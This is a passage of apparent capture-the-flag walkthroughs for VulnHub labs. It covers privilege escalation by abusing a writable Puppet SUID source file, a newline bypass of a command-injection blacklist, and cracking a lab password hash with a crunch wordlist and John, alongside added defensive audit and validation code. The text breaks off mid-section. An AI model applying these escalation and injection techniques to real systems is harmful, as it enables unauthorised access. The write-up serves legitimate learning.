OVERWRITTEN AND LOST. Changes to this xml configuration should be made using:
  virsh edit barringsbank
or other application using the libvirt API.
-->
<domain type='qemu'>
  <name>barringsbank</name>
  <uuid>6cf27edd-7559-d6eb-1502-d3135c807785</uuid>
  <description>Who do you think you are...? David Lightman from memphistennessee...?</description>
  <memory unit='KiB'>1048576</memory>
  <currentMemory unit='KiB'>1048576</currentMemory>
  <vcpu placement='static'>1</vcpu>
  <os>
    <type arch='x86_64' machine='pc-i440fx-trusty'>hvm</type>
    <boot dev='hd'/>
    <bootmenu enable='yes'/>
    <bios useserial='yes'/>
  </os>
  <features>
    <acpi/>
    <apic/>
    <pae/>
  </features>
  <clock offset='utc'/>
  <on_poweroff>destroy</on_poweroff>
  <on_reboot>restart</on_reboot>
  <on_crash>restart</on_crash>
  <devices>
    <emulator>/usr/bin/qemu-system-x86_64</emulator>
    <disk type='file' device='disk'>
      <driver name='qemu' type='qcow2'/>
      <source file='/var/lib/libvirt/images/barringsbank-1.img'/>
      <target dev='hdb' bus='ide'/>
      <address type='drive' controller='0' bus='0' target='0' unit='1'/>
    </disk>
    <controller type='pci' index='0' model='pci-root'/>
    <controller type='ide' index='0'>
      <address type='pci' domain='0x0000' bus='0x00' slot='0x01' function='0x1'/>
    </controller>
    <controller type='usb' index='0'>
      <address type='pci' domain='0x0000' bus='0x00' slot='0x01' function='0x2'/>
    </controller>
    <interface type='network'>
      <mac address='52:54:00:6d:93:6a'/>
      <source network='default'/>
      <model type='rtl8139'/>
      <address type='pci' domain='0x0000' bus='0x00' slot='0x03' function='0x0'/>
    </interface>
    <serial type='pty'>
      <target port='0'/>
    </serial>
    <console type='pty'>
      <target type='serial' port='0'/>
    </console>
    <input type='mouse' bus='ps2'/>
    <input type='keyboard' bus='ps2'/>
    <graphics type='vnc' port='-1' autoport='yes' passwd='memphistennessee'/>
    <video>
      <model type='cirrus' vram='9216' heads='1'/>
      <address type='pci' domain='0x0000' bus='0x00' slot='0x02' function='0x0'/>
    </video>
    <memballoon model='virtio'>
      <address type='pci' domain='0x0000' bus='0x00' slot='0x05' function='0x0'/>
    </memballoon>
  </devices>
</domain>
-------------------------------------------------
root@analoguepond:/etc/libvirt/qemu# cat puppet.xml
<!--
WARNING: THIS IS AN AUTO-GENERATED FILE. CHANGES TO IT ARE LIKELY TO BE
OVERWRITTEN AND LOST. Changes to this xml configuration should be made using:
  virsh edit puppet
or other application using the libvirt API.
-->
<domain type='qemu'>
  <name>puppet</name>
  <uuid>3561f84c-71c3-f16f-4a7b-9097e7d2ac39</uuid>
  <description>puppetmaster if you mess with this VM I will sendyoubacktowalker</description>
  <memory unit='KiB'>1048576</memory>
  <currentMemory unit='KiB'>1048576</currentMemory>
  <vcpu placement='static'>1</vcpu>
  <os>
    <type arch='x86_64' machine='pc-i440fx-trusty'>hvm</type>
    <boot dev='cdrom'/>
    <boot dev='hd'/>
    <bootmenu enable='yes'/>
    <bios useserial='yes'/>
  </os>
  <features>
    <acpi/>
    <apic/>
    <pae/>
  </features>
  <clock offset='utc'/>
  <on_poweroff>destroy</on_poweroff>
  <on_reboot>restart</on_reboot>
  <on_crash>restart</on_crash>
  <devices>
    <emulator>/usr/bin/qemu-system-x86_64</emulator>
    <disk type='file' device='disk'>
      <driver name='qemu' type='qcow2'/>
      <source file='/var/lib/libvirt/images/puppet-1.img'/>
      <target dev='hdb' bus='ide'/>
      <address type='drive' controller='0' bus='0' target='0' unit='1'/>
    </disk>
    <controller type='pci' index='0' model='pci-root'/>
    <controller type='ide' index='0'>
      <address type='pci' domain='0x0000' bus='0x00' slot='0x01' function='0x1'/>
    </controller>
    <controller type='usb' index='0'>
      <address type='pci' domain='0x0000' bus='0x00' slot='0x01' function='0x2'/>
    </controller>
    <interface type='network'>
      <mac address='52:54:00:5b:05:f7'/>
      <source network='default'/>
      <model type='virtio'/>
      <address type='pci' domain='0x0000' bus='0x00' slot='0x03' function='0x0'/>
    </interface>
    <serial type='pty'>
      <target port='0'/>
    </serial>
    <console type='pty'>
      <target type='serial' port='0'/>
    </console>
    <input type='mouse' bus='ps2'/>
    <input type='keyboard' bus='ps2'/>
    <graphics type='vnc' port='-1' autoport='yes' listen='127.0.0.1' passwd='sendyoubacktowalker'>
      <listen type='address' address='127.0.0.1'/>
    </graphics>
    <video>
      <model type='cirrus' vram='9216' heads='1'/>
      <address type='pci' domain='0x0000' bus='0x00' slot='0x02' function='0x0'/>
    </video>
    <memballoon model='virtio'>
      <address type='pci' domain='0x0000' bus='0x00' slot='0x04' function='0x0'/>
    </memballoon>
  </devices>
</domain>
Here we are:
‘memphistennessee’ and ‘sendyoubacktowalker’
So I next attempt to SSH to the puppet host and am presented with a possible username and a password hint in the SSH banner:
root@analoguepond:/etc/libvirt/qemu# ssh 192.168.122.2
The authenticity of host '192.168.122.2 (192.168.122.2)' can't be established.
ECDSA key fingerprint is 4e:e6:d6:38:8a:9b:3c:aa:0c:55:95:a6:57:ce:f9:e5.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.122.2' (ECDSA) to the list of known hosts.
+-----------------------------------------------+
Passwords are very dated.. Removing spaces helps sandieshaw log in with her
most famous song
+-----------------------------------------------+
Back to Google because I clearly do not have knightmare’s music knowledge and I see that Sandie Shaw’s most famous song was called ‘Puppet on a String’. At the time I wasn’t sure if the host name referred to the song name or the Puppet open-source configuration management tool. Knowing knightmare I figured it was the latter and I was in for a wild ride yet.
I logged in with the password ‘puppetonastring’ and things started to get really interesting.
My suspicions were confirmed upon checking out the /etc/puppet directory. Basically, Puppet is an open-source configuration management tool written in Ruby which uses a series of declarative statements, organised into ‘modules’, to push configuration changes from a central server down to its clients. Seeing port 8140 open and the modules/manifests in the /etc/puppet directory confirmed that I was on the puppetmaster server and that the other host in play was the client. Browsing the manifests folder for each module we can see what each module does based on the init.pp file, which declares a class and any files, content, commands, permissions, services to install, etc.
The nodes.pp file located in /etc/puppet/manifests show which hosts have which modules pushed down to them when a puppet run happens.
sandieshaw@puppet:/etc/puppet/manifests$ cat nodes.pp
node 'default'{
include vulnhub
}
node 'puppet.example.com' inherits 'default'{
include wiggle
}
node 'barringsbank.example.com' inherits 'default'{}
sandieshaw@puppet:/etc/puppet/manifests$ cat site.pp
node 'default'{
include vulnhub
}
node 'puppet.example.com' inherits 'default'{
include wiggle
}
node 'barringsbank.example.com' inherits 'default'{
include fiveeights
}
In this case we see that both hosts get the vulnhub module by inheriting the ‘default’ node, that puppet additionally gets the wiggle module and that our third host barringsbank gets the fiveeights module (per site.pp).
The vulnhub module is hilarious and is knightmare’s revenge, his way of stripping out every convenient utility we usually rely on. Bye curl, wget, fetch. No Nano! I started sweating; now I HAD to use vim. Thanks man! The module does a bunch of other stuff which is pretty self-explanatory, but one key item is the ‘puppet check in’ cron, which runs every 10 minutes. This tells us that hosts check in to the puppetmaster every 10 minutes and pick up anything new, like abused modules :).
sandieshaw@puppet:/etc/puppet/modules/vulnhub/manifests$ cat init.pp
## Module to unwind changed #vulnhub people make. This will unwind the most
## common vectors they sued to get at my other VMs
class vulnhub {
## purge packages they abuse too (hello mrB3n, GKNSB, Ch3rn0byl, mr_h4sh)
  $purge = ["nano","wget","curl","fetch","nmap","netcat-traditional","ncat","netdiscover","lftp"]
  package { $purge:
    ensure => purged,
  }
## The encryption is still primative Egyptian
  $theresas_nightmare = ["cryptcat","socat"]
  package { $theresas_nightmare:
    ensure => present,
  }
## Adding to sudoers is a bit naughty so reverse that (most of #vulnhub)
  file { "/etc/sudoers.d":
    ensure  => "directory",
    recurse => true,
    purge   => true,
    force   => true,
    owner   => root,
    group   => root,
    mode    => 0755,
    source  => "puppet:///modules/vulnhub/sudoers.d",
  }
## revert /etc/passwd (Hey Rasta_Mouse!)
  file { '/etc/passwd':
    ensure => present,
    owner  => root,
    group  => root,
    mode   => 0644,
    source => "puppet:///modules/vulnhub/${hostname}-passwd",
  }
## and /etc/group (Hello to you cmaddy)
  file { '/etc/group':
    ensure => present,
    owner  => root,
    group  => root,
    mode   => 0644,
    source => "puppet:///modules/vulnhub/${hostname}-group",
  }
## Mr Potato Head! BACKDOORS ARE NOT SECRETS (Hey GKNSB!)
  file { '/etc/ssh/ssd_config':
    ensure => present,
    owner  => root,
    group  => root,
    mode   => 0644,
    source => "puppet:///modules/vulnhub/${hostname}-sshd_config",
    notify => Service["ssh"],
  }
## Leave US keyboard for those crazy yanks, and not to torture Ch3rn0byl like
## Gibson
  cron { "puppet check in":
    command => "/usr/bin/puppet agent --test > /dev/null 2>&1",
    user    => "root",
    minute  => "*/10",
    ensure  => present,
  }
## Everyone forbidden by default
  file { '/etc/hosts.deny':
    ensure => present,
    owner  => root,
    group  => root,
    mode   => 0644,
    source => "puppet:///modules/vulnhub/hosts.deny",
  }
## Firewall off to only specific hosts
  file { '/etc/hosts.allow':
    ensure => present,
    owner  => root,
    group  => root,
    mode   => 0644,
    source => "puppet:///modules/vulnhub/${hostname}-hosts.allow",
  }
## Don't fill up the disk
  tidy { "/var/lib/puppet/reports":
    age     => "1h",
    recurse => true,
  }
## Changing openssh config requires restart
  service { 'ssh':
    ensure     => running,
    enable     => true,
    hasstatus  => true,
    hasrestart => true,
  }
}
The wiggle module directory gives us the source code for the C file that creates our spin binary which is funny but useless to attempt to reverse based on the source code. Stay tuned though, it will come into play soon.
The wiggle manifest is more interesting and is likely our priv esc. Every puppet run will check to make sure that /tmp/spin is present and then chown it as root and set the SUID bit.
sandieshaw@puppet:/etc/puppet/modules/wiggle/manifests$ cat init.pp
## My first puppet module by Nick Leeson (C) Barringsbank
## Put spin binary in /tmp to confirm puppet is working
class wiggle {
  file { ["/tmp/spin"]:
    ensure => present,
    mode   => 4755,
    owner  => root,
    group  => root,
    source => "puppet:///modules/wiggle/spin";
  }
}
The spin binary is copied from /etc/puppet/modules/wiggle/files and luckily sandieshaw has write permissions on it so we can do something nasty.
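The audit below is an added example and is not part of the write-up or the lab. It scans a Puppet modules tree for file resources that are installed setuid or setgid and checks whether the backing file under the module's files/ directory (and its parent directory) can be modified by anyone other than a trusted uid, which is exactly the weakness in play here: sandieshaw can write to /etc/puppet/modules/wiggle/files/spin, and the agent installs whatever is there as a root-owned SUID binary on its next check-in. The module layout, the sample manifest text and the temporary directory are constructed for the demonstration, and the function names are my own.

```python
import glob
import os
import re
import stat
import tempfile
from collections import namedtuple

# `source => "puppet:///modules/<module>/<path>"` and `mode => 4755` inside a file resource
SOURCE_RE = re.compile(r'source\s*=>\s*"puppet:///modules/([^/"]+)/([^"]+)"')
MODE_RE = re.compile(r'\bmode\s*=>\s*"?([0-7]{3,4})"?')
WRITABLE = stat.S_IWGRP | stat.S_IWOTH

Finding = namedtuple("Finding", "manifest source_file mode reason")


def _file_resources(text):
    """Yield the body of every `file { ... }` resource, counting braces so an
    interpolation such as ${hostname} inside the body does not end it early."""
    for m in re.finditer(r"\bfile\s*\{", text):
        depth, i = 1, m.end()
        while i < len(text) and depth:
            depth += {"{": 1, "}": -1}.get(text[i], 0)
            i += 1
        yield text[m.end():i - 1]


def audit_module_sources(modules_root, trusted_uids=(0,)):
    """Return a Finding for each setuid/setgid file resource whose backing file
    under <module>/files/ is owned by an untrusted uid, is group/world writable,
    or lives in a writable directory. Whoever can change that file gets it
    installed root-owned and SUID on every node that includes the module."""
    findings = []
    for manifest in sorted(glob.glob(os.path.join(modules_root, "*", "manifests", "*.pp"))):
        with open(manifest) as fh:
            text = fh.read()
        for body in _file_resources(text):
            mode, src = MODE_RE.search(body), SOURCE_RE.search(body)
            if not (mode and src) or "$" in src.group(2):
                continue  # no static source path to check
            if not int(mode.group(1), 8) & (stat.S_ISUID | stat.S_ISGID):
                continue  # not a privileged binary, out of scope here
            path = os.path.join(modules_root, src.group(1), "files", src.group(2))
            if not os.path.exists(path):
                findings.append(Finding(manifest, path, mode.group(1), "source missing"))
                continue
            st, parent = os.stat(path), os.stat(os.path.dirname(path))
            reasons = []
            if st.st_uid not in trusted_uids:
                reasons.append(f"owned by untrusted uid {st.st_uid}")
            if st.st_mode & WRITABLE:
                reasons.append("group/world writable")
            if parent.st_mode & WRITABLE:
                reasons.append("parent directory writable, file can be replaced")
            findings += [Finding(manifest, path, mode.group(1), r) for r in reasons]
    return findings


# Constructed copy of the wiggle manifest shown above.
SAMPLE_MANIFEST = """\
class wiggle {
  file { ["/tmp/spin"]:
    ensure => present,
    mode   => 4755,
    owner  => root,
    group  => root,
    source => "puppet:///modules/wiggle/spin";
  }
}
"""


def build_sample_module(root, spin_mode=0o664):
    """Create <root>/wiggle with a group-writable spin source file (constructed)."""
    for sub in ("manifests", "files"):
        os.makedirs(os.path.join(root, "wiggle", sub), exist_ok=True)
        os.chmod(os.path.join(root, "wiggle", sub), 0o755)
    with open(os.path.join(root, "wiggle", "manifests", "init.pp"), "w") as fh:
        fh.write(SAMPLE_MANIFEST)
    spin = os.path.join(root, "wiggle", "files", "spin")
    with open(spin, "wb") as fh:
        fh.write(b"placeholder binary\n")
    os.chmod(spin, spin_mode)
    return spin


def run_demo():
    """Audit the constructed module, tighten the spin file's mode, audit again.
    Returns (findings before, findings after)."""
    root = tempfile.mkdtemp()
    spin = build_sample_module(root)
    me = (os.getuid(),)  # the current user stands in for root in this demo
    before = audit_module_sources(root, trusted_uids=me)
    os.chmod(spin, 0o644)
    return before, audit_module_sources(root, trusted_uids=me)
```

Pointed at a real puppetmaster it would be run as `audit_module_sources("/etc/puppet/modules")` with the default trusted uid of 0; any finding means a non-root user controls what becomes a SUID root binary on every client at the next ten-minute check-in.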
rootme.sh just contains the following to add sandieshaw to the sudoers group, which is the easiest way given everything that knightmare stripped away from us:
After a bit I check and see that the spin binary was replaced based on the time stamp on the file and I am able to sudo to root without a password like a champion.
Once I escalate to root I check out the root directory for a flag or our next clues. I am presented with several files and clues.
root@puppet:/root# cd protovision/
root@puppet:/root/protovision# ls
flag1.txt.0xff jim melvin
root@puppet:/root/protovision# cat jim
Mr Potato Head! Backdoors are not a...
root@puppet:/root/protovision# cat melvin
Boy you guys are dumb! I got this all figured out...
root@puppet:/root/protovision# file flag1.txt.0xff
flag1.txt.0xff: ASCII text,with very long lines
root@puppet:/root/protovision# cat flag1.txt.0xff
3d3d674c7534795a756c476130565762764e4849793947496c4a585a6f5248496b4a3362334e3363684248496842435a756c6d5a675148616e6c5762675533623542434c756c47497a564764313557617442794d79415362764a6e5a674d585a7446325a79463256676732593046326467777961793932646751334a754e585a765247497a6c47613042695a4a4279615535454d70647a614b706b5a48316a642f67325930463264763032626a35535a6956486431395765756333643339794c364d486330524861
So we have a hex string which I decode with xxd to a reversed base64 string and eventually the YouTube link below:
root@puppet:/root/protovision# cat flag1.txt.0xff | xxd -p -r
==gLu4yZulGa0VWbvNHIy9GIlJXZoRHIkJ3b3N3chBHIhBCZulmZgQHanlWbgU3b5BCLulGIzVGd15WatByMyASbvJnZgMXZtF2ZyF2Vgg2Y0F2dgwyay92dgQ3JuNXZvRGIzlGa0BiZJByaU5EMpdzaKpkZH1jd/g2Y0F2dv02bj5SZiVHd19Weuc3d39yL6MHc0RHa
root@puppet:/root/protovision# cat flag1.txt.0xff | xxd -p -r | rev | base64 -d
https://www.youtube.com/watch?v=GfJJk7i0NTk If this doesn't work, watch Wargames from 23 minutes in, you might find a password there or something...
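As an added example (not from the write-up), here is the same xxd | rev | base64 -d pipeline in Python, applied to the flag1.txt.0xff contents quoted above so that each stage can be inspected separately, plus the inverse transform to show the round trip on a constructed message. The same decoder applies to the second hex flag later in the write-up. Function names are mine.

```python
import base64
import binascii

# flag1.txt.0xff as shown above: 400 hex digits (the file is 401 bytes with its newline)
FLAG1_HEX = (
    "3d3d674c7534795a756c476130565762764e4849793947496c4a585a6f5248496b4a3362334e3363684248496842435a756c6d5a675148616e6c5762675533623542434c756c47497a564764313557617442794d79415362764a6e5a674d585a7446325a79463256676732593046326467777961793932646751334a754e585a765247497a6c47613042695a4a4279615535454d70647a614b706b5a48316a642f67325930463264763032626a35535a6956486431395765756333643339794c364d486330524861"
)


def hex_to_bytes(hex_data):
    """Equivalent of `xxd -p -r`: drop whitespace, decode pairs of hex digits."""
    return bytes.fromhex("".join(hex_data.split()))


def decode_hex_rev_b64(hex_data):
    """hex -> bytes (xxd -p -r) -> reversed (rev) -> base64 decoded (base64 -d).
    validate=True rejects characters outside the base64 alphabet rather than
    silently skipping them, so a mangled copy fails loudly instead of decoding
    to garbage."""
    reversed_b64 = hex_to_bytes(hex_data)[::-1]
    return base64.b64decode(reversed_b64, validate=True)


def encode_hex_rev_b64(plaintext):
    """Inverse transform, used to show the round trip on constructed input."""
    return binascii.hexlify(base64.b64encode(plaintext)[::-1]).decode()


def run_demo():
    """Decode the flag file and round-trip a constructed message.
    Returns (decoded flag text, round trip succeeded)."""
    flag_text = decode_hex_rev_b64(FLAG1_HEX).decode()
    sample = b"constructed sample message"
    return flag_text, decode_hex_rev_b64(encode_hex_rev_b64(sample)) == sample


if __name__ == "__main__":
    text, ok = run_demo()
    print(text)
    print("round trip ok:", ok)
```

The `==` padding sitting at the front of the xxd output is the tell that the base64 has been reversed: padding only ever appears at the end of a valid encoding.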
This leads us to our mandatory movie reference, this one being from the scene in WarGames where the characters are discussing back doors: “Mr. Potato Head! Backdoors are not secrets.” In this case we may have a password of ‘secrets’ for something?
The characters also go on to correctly guess ‘Joshua’ is the back door phrase in the movie, I keep this in my back pocket for later. Maybe another password?
Exploring the directory yields a jpeg and then leads us down a rabbit hole of hidden directories.
root@puppet:/root/protovision# ls -la
total 24
drwxr-xr-x 3 root root 4096 Dec 21  2016 .
drwx------ 4 root root 4096 Jan  7 17:49 ..
-rw-r--r-- 1 root root  401 Dec 21  2016 flag1.txt.0xff
drwxr-xr-x 3 root root 4096 Dec 21  2016 .I_have_you_now
-rw-r--r-- 1 root root   39 Dec 17  2016 jim
-rw-r--r-- 1 root root   53 Dec 17  2016 melvin
root@puppet:/root/protovision# cd .I_have_you_now/
root@puppet:/root/protovision/.I_have_you_now# ls
grauniad_1995-02-27.jpeg
root@puppet:/root/protovision/.I_have_you_now# file grauniad_1995-02-27.jpeg
grauniad_1995-02-27.jpeg: JPEG image data, JFIF standard 1.02
root@puppet:/root/protovision/.I_have_you_now# ls -la
total 84
drwxr-xr-x 3 root root  4096 Dec 21  2016 .
drwxr-xr-x 3 root root  4096 Dec 21  2016 ..
drwxr-xr-x 3 root root  4096 Dec 18  2016 .a
-r-------- 1 root root 71790 Dec 18  2016 grauniad_1995-02-27.jpeg
The jpeg file does have something hidden in the exif data:
root@kali2:~/Desktop# exiftool grauniad_1995-02-27.jpeg
ExifTool Version Number         : 10.36
File Name                       : grauniad_1995-02-27.jpeg
Directory                       : .
File Size                       : 70 kB
File Modification Date/Time     : 2016:12:22 22:53:22-05:00
File Access Date/Time           : 2016:12:22 22:53:25-05:00
File Inode Change Date/Time     : 2016:12:22 22:53:22-05:00
File Permissions                : rwxr-xr-x
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
Exif Byte Order                 : Big-endian (Motorola, MM)
X Resolution                    : 72
Y Resolution                    : 72
Resolution Unit                 : inches
Software                        : Acorn version 4.5.1
Exif Image Width                : 460
Exif Image Height               : 276
XP Comment                      : SHA1SUM 0a1f5d1ba9f15fd38b6e37734707bfd295a6795c
Padding                         : (Binary data 2060 bytes, use -b option to extract)
JFIF Version                    : 1.02
Image Width                     : 460
Image Height                    : 276
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 460x276
Megapixels                      : 0.127
I was unable to crack the SHA1 hash but I hold onto it for later, knowing that knightmare doesn’t generally make mistakes or put things in his challenges that aren’t connected.
I list out all the subdirectories and am damn glad I didn’t do this by hand.
Heading in I find several files which look to form a private key if assembled properly. At the bottom of this mess I find a file with the phrase ‘joshua’, which we earlier established must be useful for something, as well as a gpg encrypted file that by the file name could be an SSH key for a user ‘nleeson’.
root@puppet:/root/protovision/.I_have_you_now/.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u/.v/.w/.x/.y/.z# ls
my_world_you_are_persistent_try nleeson_key.gpg
root@puppet:/root/protovision/.I_have_you_now/.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u/.v/.w/.x/.y/.z# file my_world_you_are_persistent_try
my_world_you_are_persistent_try: ASCII text
root@puppet:/root/protovision/.I_have_you_now/.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u/.v/.w/.x/.y/.z# cat my_world_you_are_persistent_try
joshua
The gpg file decrypts to a private key file as suspected. The password that worked was actually ‘secret’ not ‘secrets’.
I test out the key and am able to SSH to the barringsbank host with the private key and passphrase ‘joshua’ from earlier.
root@puppet:/root# chmod 600 nick_key
root@puppet:/root# ssh -i nick_key nleeson@192.168.122.3
Enter passphrase for key 'nick_key':
Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 4.4.0-57-generic x86_64)

 * Documentation:  https://help.ubuntu.com/

System information disabled due to load higher than 1.0

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

nleeson@barringsbank:~$
This system is pretty bare so I turn back to Puppet for clues. Looking at the Puppet configuration I see that I can edit /etc/puppet/manifests/site.pp and nodes.pp to include the wiggle module on barringsbank as well. I make this change and wait a bit for the next agent check-in.
nleeson@barringsbank:~$ cd /tmp
nleeson@barringsbank:/tmp$ ./spin
nleeson@barringsbank:/tmp$ sudo -s
root@barringsbank:/tmp# cd /root
root@barringsbank:/root# ls
me.jpeg
Now we have another image file which I pull down locally and run steghide against. We’ve come full circle and the term ‘reticulating splines’ was the passphrase.
root@kali:/var/www/html# steghide extract -sf me.jpeg
Enter passphrase:
wrote extracted data to "primate_egyptian_flag.txt".
root@kali2-CTP:/var/www/html# cat primate_egyptian_flag.txt
Looks like hex again, which then decodes to another reversed base64 string. At last, the final flag:
What an awesome, intense, and comprehensive challenge! Thanks to knightmare for making this and to g0tm1lk and the whole vulnhub community for hosting this one! Until next time.
Each VM has a landing page which describes the challenge and number of flags:
I. Discovery
I started off with an nmap scan and didn’t turn up anything other than the standard web and SSH ports.
root@kali~# nmap -sV 172.16.94.143
Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2016-12-06 09:59 EST
Nmap scan report for 172.16.94.143
Host is up (0.00040s latency).
Not shown: 997 filtered ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.2 (FreeBSD 20160310; protocol 2.0)
80/tcp  open  http     Apache httpd 2.4.23 ((FreeBSD) OpenSSL/1.0.2j-freebsd PHP/5.6.27)
443/tcp open  ssl/http Apache httpd 2.4.23 ((FreeBSD) OpenSSL/1.0.2j-freebsd PHP/5.6.27)
MAC Address: 00:0C:29:D5:71:50 (VMware)
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.06 seconds
I ran Nikto next but did not get anything back, so I fired up Dirbuster which turned up a scanner.php page pretty quickly.
II. Command Injection
Firing up Burp and sending the request to repeater screams command injection.
Bit of a troll here, tried several tactics and all gave me this result.
Eventually I found that a carriage return would bypass the filter.
Here is the contents of scanner.php which shows the characters being filtered.
<html>
<head>
<title>S C A N N 3 R</title>
<link rel="stylesheet" href="styles.css" type="text/css" />
</head>
<body>
<div class="container">
<form method="POST" action="">
<input class="form" type="text" name="host" value="127.0.0.1" />
<input class="button" type="submit" value="Scan Target" />
</form>
<?php
if (isset($_POST['host'])) {
    $cmd = "/usr/local/bin/nmap -F -sT " . $_POST['host'];
    echo "<pre>Command: $cmd\n\n</pre>";
    if (strpos($cmd, ";") !== FALSE || strpos($cmd, "|") !== FALSE || strpos($cmd, "&") !== FALSE) {
        echo "<pre>Nope. Good try though... ?</pre>\n";
    } else {
        $output = shell_exec($cmd);
        echo "<pre>$output</pre>";
    }
}
?>
<img class="logo" src="logo.png">
</div>
</body>
</html>
</pre><img class="logo" src="logo.png"></div></body></html>
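scanner.php rejects only `;`, `|` and `&` and then hands the string to shell_exec(), which is why a newline gets through: the shell treats it as a command separator that the filter never looked for. The following Python re-implementation of the check is an added example (not the lab's PHP; function names are mine) that places the blacklist beside the fix a defender would reach for: an allowlist validator that accepts only an IP address or a plain hostname, and a command built as an argument vector so that no shell ever parses the value.

```python
import ipaddress
import re

# The characters scanner.php rejects; anything else reaches shell_exec() as-is.
BLACKLIST = (";", "|", "&")


def blacklist_allows(host):
    """Re-implementation of the page's check: True means the request goes through."""
    return not any(ch in host for ch in BLACKLIST)


# One DNS label: 1-63 chars of [A-Za-z0-9-], neither starting nor ending with '-'.
_LABEL = r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
_HOSTNAME_RE = re.compile(rf"{_LABEL}(?:\.{_LABEL})*")


def is_valid_target(host):
    """Allowlist check: the value must be a literal IP address or a plain DNS
    hostname. fullmatch() is used deliberately; re.match() with a '$' anchor
    still accepts a trailing newline, which is exactly the bypass found above."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        pass
    return len(host) <= 253 and _HOSTNAME_RE.fullmatch(host) is not None


def build_scan_argv(host):
    """Return the scan command as an argument vector for subprocess.run()
    without shell=True (the PHP equivalent is escapeshellarg(), or better,
    not involving a shell at all). The host is a single argv element, so a
    newline or any other metacharacter inside it is just part of one argument."""
    if not is_valid_target(host):
        raise ValueError(f"refusing to scan invalid target {host!r}")
    return ["/usr/local/bin/nmap", "-F", "-sT", host]


def run_demo():
    """Compare both checks on the form default, a constructed hostname and the
    separator cases from the write-up.
    Returns {input: (blacklist lets it through, allowlist accepts it)}."""
    cases = [
        "127.0.0.1",         # the form's default value
        "host.example",      # constructed hostname
        "127.0.0.1;ls",      # caught by the blacklist
        "127.0.0.1\nls",     # the newline bypass from the write-up
        "127.0.0.1\r\nls",   # carriage return + newline variant
    ]
    return {c: (blacklist_allows(c), is_valid_target(c)) for c in cases}
```

The point the table makes is that the two checks disagree only on the inputs that matter: the blacklist passes the newline variants, the allowlist rejects every string that is not a host.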
I issued a quick command to locate all 3 flags, next I set out to grab each one.
I found flag 1 hiding in the web root with the following commands.
ls
index.html
k1ngd0m_k3yz
logo.png
s1kr3t
scanner.php
styles.css
ls s1kr3t
flag.txt
cat s1kr3t/flag.txt
FLAG{n0_one_br3aches_teh_f0rt}
Flag 2
For flag 2 I had to dig around the file system a bit more and figure out a password to SSH in. I issued the following commands which confirmed that I had to gain access as the ‘craven’ user to read the flag and also gave me a hint and reminder file.
ls -la /usr/home/craven/
drwxr-xr-x  2 craven  craven   512 Nov  9 19:58 .
drwxr-xr-x  4 root    wheel    512 Nov  5 01:59 ..
-rw-r--r--  1 craven  craven  1055 Nov  5 01:59 .cshrc
-rw-------  1 craven  craven     5 Nov  7 20:24 .gdb_history
-rw-r--r--  1 craven  craven    60 Nov  7 20:36 .gdbinit
-rw-r--r--  1 craven  craven   254 Nov  5 01:59 .login
-rw-r--r--  1 craven  craven   163 Nov  5 01:59 .login_conf
-rw-------  1 craven  craven   379 Nov  5 01:59 .mail_aliases
-rw-r--r--  1 craven  craven   336 Nov  5 01:59 .mailrc
-rw-r--r--  1 craven  craven   802 Nov  5 01:59 .profile
-rw-------  1 craven  craven   281 Nov  5 01:59 .rhosts
-rw-r--r--  1 craven  craven   978 Nov  5 01:59 .shrc
-r--------  1 craven  craven    46 Nov  6 01:30 flag.txt
-rw-r--r--  1 craven  craven   119 Nov  5 02:23 hint.txt
-rw-r--r--  1 craven  craven    77 Nov  5 02:20 reminders.txt
cat /usr/home/craven/hint.txt
Keep forgetting my password, so I made myself a hint. Password is three digits followed by my
pet's name and a symbol.
cat /usr/home/craven/reminders.txt
To buy:
* skim milk
* organic free-run eggs
* dog bone for qwerty
* sriracha
OK, it looks like I need to create a wordlist with three digits, the pet name qwerty and a special character. The Crunch tool can do this for me. The command below gives me only 10-character results: three digits, followed by the pet name and a special character.
crunch 10 10 -t %%%qwerty^ > craven.txt
Crunch will now generate the following amount of data:363000 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines:33000
Now what can I use this for since the instructions said no SSH bruteforcing is needed? Back to the webroot I found snippets from the /etc/passwd and /etc/master.passwd (which is the FreeBSD shadow file equivalent) files.
ls k1ngd0m_k3yz
master
passwd
cat k1ngd0m_k3yz/passwd
craven:*:1002:1002:User&:/home/craven:/bin/sh
cat k1ngd0m_k3yz/master
craven:$6$qAgPM2TEordSoFnH$4uPUAhB.9rORkWExA8jI0Sbwn0Bj50KAK0tJ4rkrUrIkP6v.gE/6Fw9/yn1Ejl2TedyN5ziUz8N0unsHocuks.:1002:1002::0:0:User&:/home/craven:/bin/sh
I saved down the files, unshadowed them and threw the file into John with my fancy wordlist.
unshadow passwd shadow > to_crack
cat to_crack
craven:$6$qAgPM2TEordSoFnH$4uPUAhB.9rORkWExA8jI0Sbwn0Bj50KAK0tJ4rkrUrIkP6v.gE/6Fw9/yn1Ejl2TedyN5ziUz8N0unsHocuks.:1002:1002:User&:/home/craven:/bin/sh
john --wordlist=craven.txt to_crack
john --show to_crack
craven:931qwerty?:1002:1002:User&:/home/craven:/bin/sh
1 password hash cracked,0 left
With that password I was able to SSH in and grab the second flag.
Flag 3
I took the easy route here and also got a bit lucky. I ran strings against the binary and focused on this section.
%s [file to read]
Checking file type...
Symbolic links not allowed!
Checking if flag file...
flag
Nope. Can't let you have the flag.
